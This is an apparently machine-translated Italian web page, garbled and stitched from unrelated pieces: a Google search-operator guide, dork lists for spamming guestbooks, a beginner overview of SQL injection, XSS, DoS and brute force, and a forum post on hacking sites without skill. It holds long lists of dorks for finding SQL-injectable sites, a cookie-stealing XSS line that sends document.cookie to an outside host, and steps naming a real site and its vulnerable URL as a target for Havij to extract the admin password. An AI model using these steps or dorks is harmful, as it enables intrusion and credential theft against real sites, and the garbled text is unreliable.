Istruzioni per l'uso di jSQL Injection, uno strumento multifunzionale per trovare e sfruttare le iniezioni SQL in Kali Linux. Istruzioni per l'uso di jSQL Injection: uno strumento multifunzionale per trovare e sfruttare le iniezioni SQL in Kali Linux

Come cercare utilizzando google.com

Probabilmente tutti sanno come utilizzare un motore di ricerca come Google =) Ma non tutti sanno che se componi correttamente una query di ricerca utilizzando strutture speciali, puoi ottenere i risultati di ciò che stai cercando in modo molto più efficiente e veloce =) In questo articolo Proverò a mostrarlo e come devi fare per cercare correttamente

Google supporta diversi operatori di ricerca avanzati che hanno un significato speciale durante la ricerca su google.com. In genere, questi operatori modificano la ricerca o addirittura dicono a Google di eseguire tipi di ricerca completamente diversi. Ad esempio, la costruzione collegamento:è un operatore speciale e la query collegamento: www.google.com non ti darà una ricerca normale, ma troverà invece tutte le pagine web che hanno collegamenti a google.com.
tipi di richiesta alternativi

cache: Se includi altre parole nella query, Google evidenzierà le parole incluse nel documento memorizzato nella cache.
Per esempio, cache: www.sito web mostrerà il contenuto memorizzato nella cache con la parola "web" evidenziata.

collegamento: la query di ricerca di cui sopra mostrerà pagine Web che contengono collegamenti alla query specificata.
Per esempio: collegamento: www.sito web visualizzerà tutte le pagine che hanno un collegamento a http://www.site

imparentato: Visualizza le pagine Web "correlate" alla pagina Web specificata.
Per esempio, correlati: www.google.com elencherà le pagine Web simili alla home page di Google.

Informazioni: Richiedi informazioni: fornirà alcune informazioni che Google ha sulla pagina web richiesta.
Per esempio, info: sito web mostrerà informazioni sul nostro forum =) (Armada - Forum di webmaster per adulti).

Altre richieste di informazioni

definire: La query define: fornirà una definizione delle parole digitate dopo questa, compilata da varie fonti online. La definizione sarà per l'intera frase inserita (ovvero includerà tutte le parole nella query esatta).

scorte: Se avvii una query con le azioni: Google tratterà il resto dei termini della query come simboli di ticker di borsa e collegherà a una pagina che mostra le informazioni preparate per questi simboli.
Per esempio, azioni: Intel yahoo mostrerà informazioni su Intel e Yahoo. (Nota che devi stampare i caratteri delle ultime notizie, non il nome dell'azienda)

Modificatori di richiesta

luogo: Se includi site: nella tua query, Google limiterà i risultati ai siti Web che trova in quel dominio.
Puoi anche cercare singole zone, come ru, org, com, ecc ( sito:com sito:ru)

allintitle: Se esegui una query con allintitle:, Google limiterà i risultati con tutte le parole della query nel titolo.
Per esempio, allintitle: ricerca su google restituirà tutte le pagine di ricerca di Google come immagini, blog, ecc

titolo: Se includi intitle: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nel titolo.
Per esempio, titolo: Affari

allinurl: Se esegui una query con allinurl: Google limiterà i risultati con tutte le parole della query nell'URL.
Per esempio, allinurl: ricerca su google restituirà documenti con google e cercherà nel titolo. Inoltre, come opzione, puoi separare le parole con una barra (/), quindi le parole su entrambi i lati della barra verranno cercate all'interno della stessa pagina: Esempio allinurl: foo/bar

URL: Se includi inurl: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nell'URL.
Per esempio, URL animazione: sito web

nel testo: cerca solo nel testo della pagina la parola specificata, ignorando il titolo e i testi dei collegamenti e altre cose non correlate a.C'è anche un derivato di questo modificatore - allintext: quelli. inoltre, tutte le parole nella query verranno cercate solo nel testo, che è anche importante, ignorando le parole usate di frequente nei collegamenti
Per esempio, testo:forum

intervallo di date: ricerche in intervalli di tempo (intervallo di date:2452389-2452389), le date per l'ora sono specificate in formato giuliano.

Bene, e tutti i tipi di esempi interessanti di richieste

Esempi di compilazione di query per Google. Per gli spammer

inurl:control.guest?a=segno

Sito:books.dreambook.com “URL pagina iniziale” “Firma il mio” inurl:firma

Sito: www.freegb.net Homepage

Inurl:sign.asp "Conteggio caratteri"

"Messaggio:" inurl:sign.cfm "Mittente:"

inurl:register.php “Registrazione utente” “Sito web”

Inurl:edu/guestbook “Firma il libro degli ospiti”

Inurl:post "Pubblica commento" "URL"

Inurl:/archives/ "Commenti:" "Ricordi informazioni?"

"Script e libro degli ospiti creato da:" "URL:" "Commenti:"

inurl:?action=add “phpBook” “URL”

Titolo: "Invia nuova storia"

Riviste

inurl:www.livejournal.com/users/mode=reply

inurl greatjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Libro degli ospiti"

Blog

Inurl:blogger.com/comment.g?"postID""anonimo"

Inurl:typepad.com/ "Pubblica un commento" "Ricordi informazioni personali?"

Inurl:greatestjournal.com/community/ “Post comment” “indirizzi di poster anonimi”

“Post comment” “indirizzi di poster anonimi” -

Titolo:"Pubblica commento"

Inurl:pirillo.com “Pubblica un commento”

Forum

Inurl:gate.html?"nome=Forum" "modalità=risposta"

inurl:”forum/posting.php?mode=reply”

inurl:"mes.php?"

inurl:"members.html"

inurl:forum/memberlist.php?"

Ho deciso di parlare un po' di sicurezza delle informazioni. L'articolo sarà utile per i programmatori alle prime armi e per coloro che hanno appena iniziato a sviluppare frontend. Qual è il problema?

Molti sviluppatori alle prime armi sono così dipendenti dalla scrittura di codice che dimenticano completamente la sicurezza del loro lavoro. E, soprattutto, dimenticano vulnerabilità come la query SQL, XXS. Trovano anche password facili per i loro pannelli amministrativi e sono soggetti alla forza bruta. Quali sono questi attacchi e come possono essere evitati?

SQL Injection

L'SQL injection è il tipo più comune di attacco al database che viene eseguito con una query SQL per un DBMS specifico. Molte persone e persino grandi aziende subiscono tali attacchi. Il motivo è l'errore di uno sviluppatore durante la scrittura di un database e, di fatto, le query SQL.

Un attacco di tipo SQL injection è possibile a causa dell'errata elaborazione dei dati di input utilizzati nelle query SQL. Con un attacco riuscito da parte di un hacker, si corre il rischio di perdere non solo il contenuto dei database, ma anche le password e i log del pannello amministrativo, rispettivamente. E questi dati saranno sufficienti per rilevare completamente il sito o apportare modifiche irreversibili ad esso.

L'attacco può essere riprodotto con successo in script scritti in PHP, ASP, Perl e altri linguaggi. Il successo di tali attacchi dipende maggiormente da quale DBMS viene utilizzato e da come viene implementato lo scenario stesso. Ci sono molti siti vulnerabili per le iniezioni SQL nel mondo. Questo è facile da verificare. È sufficiente inserire "dork": si tratta di richieste speciali per trovare siti vulnerabili. Ecco qui alcuni di loro:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?categoria=
  • inurl:articolo.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:articolo.php?id=

Come usarli? È sufficiente inserirli nel motore di ricerca Google o Yandex. Il motore di ricerca ti fornirà non solo un sito vulnerabile, ma anche una pagina per questa vulnerabilità. Ma non ci fermeremo qui e ci assicureremo che la pagina sia davvero vulnerabile. Per questo è sufficiente mettere una virgoletta singola “‘” dopo il valore “id=1”. Qualcosa come questo:

  • inurl:games.php?id=1'

E il sito ci darà un errore sulla query SQL. Di cosa ha bisogno il nostro hacker?

E poi ha bisogno proprio di questo link alla pagina con un errore. Quindi il lavoro sulla vulnerabilità nella maggior parte dei casi avviene nel kit di distribuzione "Kali linux" con le sue utilità per questa parte: l'introduzione del codice di injection e l'esecuzione delle operazioni necessarie. Come questo accadrà, non posso dirtelo. Ma puoi trovare informazioni su questo su Internet.

Attacco XSS

Questo tipo di attacco viene effettuato sui cookie. A loro volta, amano molto salvare gli utenti. Perchè no? Come senza di loro? Dopotutto, grazie ai cookie, non guidiamo una password da Vk.com o Mail.ru un centinaio di volte. E sono pochi quelli che li rifiutano. Ma su Internet compare spesso una regola per gli hacker: il coefficiente di convenienza è direttamente proporzionale al coefficiente di insicurezza.

Per implementare un attacco XSS, il nostro hacker ha bisogno della conoscenza di JavaScript. Il linguaggio a prima vista è molto semplice e innocuo, perché non ha accesso alle risorse del computer. Un hacker può lavorare con JavaScript solo in un browser, ma questo è abbastanza. Dopotutto, la cosa principale è inserire il codice nella pagina web.

Non entrerò nei dettagli sul processo di attacco. Dirò solo le basi e il significato di come ciò accade.

Un hacker può aggiungere codice JS a qualche forum o libro degli ospiti:

Gli script ci reindirizzano a una pagina infetta in cui verrà eseguito il codice: che si tratti di uno sniffer, di una sorta di archiviazione o di un exploit che in qualche modo ruberà i nostri cookie dalla cache.

Perché JavaScript? Perché JavaScript è ottimo con le richieste web e ha accesso ai cookie. Ma se il nostro script ci trasferirà su qualche sito, l'utente lo noterà facilmente. Qui, l'hacker usa un'opzione più astuta: inserisce semplicemente il codice nell'immagine.

Img=nuovaImmagine();

Img.src=" http://192.168.1.7/sniff.php?"+document.cookie;

Creiamo semplicemente un'immagine e le assegniamo il nostro script come indirizzo.

Come proteggersi da tutto questo? Molto semplice: non seguire link sospetti.

Attacchi DoS e DDos


DoS (dall'inglese Denial of Service - Denial of Service è un attacco hacker a un sistema informatico con l'obiettivo di portarlo al fallimento. Questa è la creazione di tali condizioni in cui gli utenti coscienziosi del sistema non possono accedere alle risorse di sistema fornite (server), o questo accesso è difficile. Il guasto del sistema può anche essere un passo verso la sua cattura se, in caso di emergenza, il software fornisce informazioni critiche: ad esempio la versione, parte del codice del programma, ecc. Ma il più delle volte è una misura economica pressione: la perdita di un semplice servizio che genera reddito. Fatture del provider o misure per evitare l'attacco colpiscono in modo significativo il "bersaglio" in tasca. Attualmente, gli attacchi DoS e DDoS sono i più popolari, poiché consentono di portare quasi tutti i sistemi al fallimento senza lasciare prove legalmente significative.

Qual è la differenza tra attacchi DoS e DDos?

DoS è un attacco costruito in modo intelligente. Ad esempio, se il server non verifica la correttezza dei pacchetti in arrivo, un hacker può effettuare una richiesta del genere che verrà elaborata per sempre e non ci sarà abbastanza tempo del processore per lavorare con altre connessioni. Di conseguenza, i clienti riceveranno una negazione del servizio. Ma non funzionerà per sovraccaricare o disabilitare grandi siti noti in questo modo. Sono dotati di canali abbastanza ampi e server super potenti che possono facilmente far fronte a un tale sovraccarico.

DDoS è in realtà lo stesso attacco di DoS. Ma se in DoS c'è un pacchetto di richiesta, allora in DDoS potrebbero essercene centinaia o più. Anche i server pesanti potrebbero non essere in grado di far fronte a un tale sovraccarico. Ti faccio un esempio.

Un attacco DoS è quando stai conversando con qualcuno, ma poi una persona maleducata si avvicina e inizia a urlare forte. Parlare è impossibile o molto difficile. Soluzione: chiamare la sicurezza, che calmerà e porterà la persona fuori dalla stanza. Gli attacchi DDoS si verificano quando migliaia di persone così maleducate si imbattono in. In questo caso, le guardie non saranno in grado di torcere e portare via tutti.

DoS e DDoS sono prodotti dai computer, i cosiddetti zombie. Si tratta di computer di utenti hackerati da hacker che non sospettano nemmeno che la loro macchina sia coinvolta nell'attacco di alcun server.

Come proteggersi da questo? In generale, in nessun modo. Ma puoi complicare il compito di un hacker. Per fare ciò, devi scegliere un buon hosting con server potenti.

Attacco di forza bruta

Uno sviluppatore può inventare molti sistemi di protezione dagli attacchi, rivedere completamente gli script che abbiamo scritto, controllare le vulnerabilità del sito, ecc. Ma quando si tratta dell'ultimo passaggio del layout del sito, vale a dire quando inserisce una password nel pannello di amministrazione, può dimenticare una cosa. Parola d'ordine!

Si sconsiglia vivamente di impostare una semplice password. Può essere 12345, 1114457, vasya111, ecc. Non è consigliabile impostare password con una lunghezza inferiore a 10-11 caratteri. Altrimenti, potresti essere soggetto all'attacco più comune e non complesso: Brute Force.

La forza bruta è un attacco di forza bruta con password basato su dizionario che utilizza programmi speciali. I dizionari possono essere diversi: latino, ordinamento per numeri, diciamo fino a un certo intervallo, misto (latino + numeri), e ci sono anche dizionari con simboli univoci @#4$%&*~~`'”\ ? eccetera.

Ovviamente questo tipo di attacco è facile da evitare, basta inventare una password complessa. Anche il captcha può salvarti. Inoltre, se il tuo sito è realizzato su CMS, molti di loro calcolano un tipo di attacco simile e bloccano l'ip. Dobbiamo sempre ricordare che più caratteri sono diversi nella password, più difficile è raccoglierla.

Come funzionano gli hacker? Nella maggior parte dei casi, sospettano o conoscono già parte della password. È abbastanza logico presumere che la password dell'utente non sarà certamente composta da 3 o 5 caratteri. Tali password portano a frequenti hack. Fondamentalmente, gli hacker prendono un intervallo da 5 a 10 caratteri e vi aggiungono alcuni caratteri che probabilmente conoscono in anticipo. Quindi, genera password con gli intervalli desiderati. La distribuzione Kali Linux ha anche programmi per questi casi. E voilà, l'attacco non durerà più a lungo, poiché il volume del dizionario non è più così grande. Inoltre, un hacker può utilizzare la potenza della scheda video. Alcuni di essi supportano il sistema CUDA, mentre la velocità di enumerazione aumenta fino a 10 volte. E ora vediamo che un attacco in un modo così semplice è abbastanza reale. Ma non solo i siti sono soggetti alla forza bruta.

Cari sviluppatori, non dimenticate mai il sistema di sicurezza delle informazioni, perché oggi molte persone, compresi gli stati, subiscono attacchi di questo tipo. Dopotutto, la più grande vulnerabilità è una persona che può sempre essere distratta da qualche parte o trascurare da qualche parte. Siamo programmatori, ma non macchine programmate. Stai sempre in allerta, perché la perdita di informazioni minaccia di gravi conseguenze!

E quindi, ora parlerò di come hackerare qualcosa senza una conoscenza speciale di nulla. Dico subito, c'è poco beneficio da questo, ma comunque.
Innanzitutto, devi trovare i siti stessi. Per fare ciò, vai su google.com e cerca dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= io nurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= in url:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2. php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql. php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4? id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl: look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:.php?id=1" inurl:.php?cat=1" inurl:.php?catid= 1" inurl:.php?num=1" inurl:.php?bid=1" inurl:.php?pid=1" inurl:.php?nid=1"

ecco un piccolo frammento. Puoi usare il tuo. E così, abbiamo trovato il sito. Ad esempio http://www.vestitambov.ru/
Quindi, scarica questo programma

**Contenuto nascosto: per vedere questo contenuto nascosto, il conteggio dei tuoi post deve essere 3 o superiore.**

Fare clic su OK. Quindi inseriamo il sito della vittima.
Premiamo start. Successivamente, stiamo aspettando i risultati.
E così, il programma ha riscontrato una vulnerabilità SQL.

Quindi, scarica Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= incolla lì il link risultante. Non ti spiego come usare Havij e dove scaricarlo, non è difficile trovarlo. Tutti. Hai ricevuto i dati di cui hai bisogno: la password dell'amministratore, e poi tocca alla tua immaginazione.

PS Questo è il mio primo tentativo di scrivere qualcosa. Mi dispiace se è sbagliato

Condividi con gli amici o salva per te:

Caricamento in corso...